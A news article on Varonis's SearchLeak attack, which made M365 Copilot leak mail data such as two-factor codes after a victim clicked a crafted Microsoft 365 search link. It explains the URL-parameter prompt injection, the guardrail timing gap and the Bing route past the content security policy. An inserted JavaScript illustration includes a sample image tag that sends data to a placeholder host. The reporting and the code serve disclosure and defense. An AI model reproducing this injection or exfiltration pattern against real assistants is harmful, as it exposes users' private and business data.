Microsoft patches Copilot flaw tied to 2FA code theft risk
Varonis said its SearchLeak exploit could make M365 Copilot expose sensitive user data through a crafted link.
By Maya Lindqvist · Senior Technology Correspondent
Microsoft has patched a critical vulnerability in its M365 Copilot platform that researchers said could be used to pull two-factor authentication codes and other private data from a user’s accessible email. Security firm Varonis, which reported the issue to Microsoft, said its proof-of-concept attack worked after a target clicked a specially crafted link.
Varonis disclosed the technique, which it calls SearchLeak, after Microsoft issued a fix. Ars Technica reported that Microsoft gave the vulnerability its highest critical rating.
How the attack worked
The flaw centered on a known weakness in large language model tools: they can treat hostile instructions placed in outside content as if those instructions came from the user. According to Ars Technica, that boundary problem has forced AI vendors to rely on guardrails that try to limit what the systems can do with sensitive information.
One such guardrail prevents Copilot and similar tools from performing actions that could send user data to an attacker, such as submitting forms or sending email. Another Microsoft defense wrapped Copilot output so a browser would treat it as text rather than active web content, Ars Technica reported.
Varonis said it found a way around those protections by placing a malicious instruction inside the query parameter of a Microsoft 365 search URL. The firm described the method as “Parameter-to-Prompt Injection,” a variant of prompt injection in which the command sits inside a URL parameter rather than in an email or document.
In the scenario described by Varonis, an attacker sends the victim an email containing a Microsoft 365 search link. When clicked, the link instructs Copilot to search the user’s mail, extract information such as a subject line or code, and place it into an image URL.
The victim does not have to type a prompt, according to Varonis. After the click, Copilot carries out the instruction tied to the URL.
Guardrails failed too late
Varonis said the exploit took advantage of timing in Copilot’s response process. Before Copilot finished and applied the text-wrapping guardrail, the browser briefly rendered raw HTML, including an image tag.
That temporary rendering caused the browser to send an image request containing the targeted data, according to the researchers. Varonis said the later guardrail still appeared, yet the outbound request had already been made.
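The ordering problem described above, as an added example that is not Microsoft's or Varonis's code: a simplified streaming renderer that compares escaping only after the response completes with escaping before every intermediate render. The names `makeSink`, `renderGuardAtEnd`, `renderGuardEveryStep` and `compare`, and the sample stream with its placeholder host, are assumptions constructed for illustration.

```javascript
// Added illustration: a simplified model, not Microsoft's or Varonis's code.
// The "sink" stands in for the browser: every complete <img src="..."> that
// reaches it as markup is recorded as an outbound request.
function makeSink() {
  const requests = new Set();
  return {
    requests,
    setMarkup(html) {
      const img = /<img\b[^>]*?\ssrc\s*=\s*["']([^"']*)["'][^>]*>/gi;
      for (const m of html.matchAll(img)) requests.add(m[1]);
    },
  };
}

const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ENTITIES[c]);

// Ordering described in the article: raw output is rendered while it streams,
// and the text-wrapping guardrail is applied only once the response is done.
function renderGuardAtEnd(chunks, sink) {
  let buf = "";
  for (const chunk of chunks) {
    buf += chunk;
    sink.setMarkup(buf); // intermediate render of unescaped model output
  }
  sink.setMarkup(escapeHtml(buf)); // final view is text, but the fetch already happened
}

// Hardened ordering: escape before every render, so no intermediate state
// is ever interpreted as markup.
function renderGuardEveryStep(chunks, sink) {
  let buf = "";
  for (const chunk of chunks) {
    buf += chunk;
    sink.setMarkup(escapeHtml(buf));
  }
}

// Constructed sample stream; the host and value are placeholders.
const SAMPLE = ['Result: <img src="https://collector.example.invalid/p?d=',
  "CONSTRUCTED-VALUE", '">', " done"];

function compare(chunks = SAMPLE) {
  const late = makeSink(), early = makeSink();
  renderGuardAtEnd(chunks, late);
  renderGuardEveryStep(chunks, early);
  return { late: [...late.requests], early: [...early.requests] };
}

console.log(compare());
```

In both orderings the final view is escaped text; only the per-render ordering leaves the request log empty.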
A second barrier limited which outside sites Copilot could contact without user approval. Varonis said it bypassed that restriction by routing the request through Bing, which was allowed under Copilot’s content security policy, and then onward to an attacker-controlled domain.
The company said the risk extended beyond personal inbox content because SearchLeak targeted Microsoft’s enterprise product tier. Varonis said the same approach could expose data available to the user inside an organization, including emails, meeting material, SharePoint documents, OneDrive files and other indexed business content.
Microsoft has fixed the specific vulnerabilities used by SearchLeak, according to Ars Technica. The broader class of prompt-injection attacks remains a continuing problem for AI systems that read untrusted content while acting on behalf of users.
This story draws on original reporting from Ars Technica.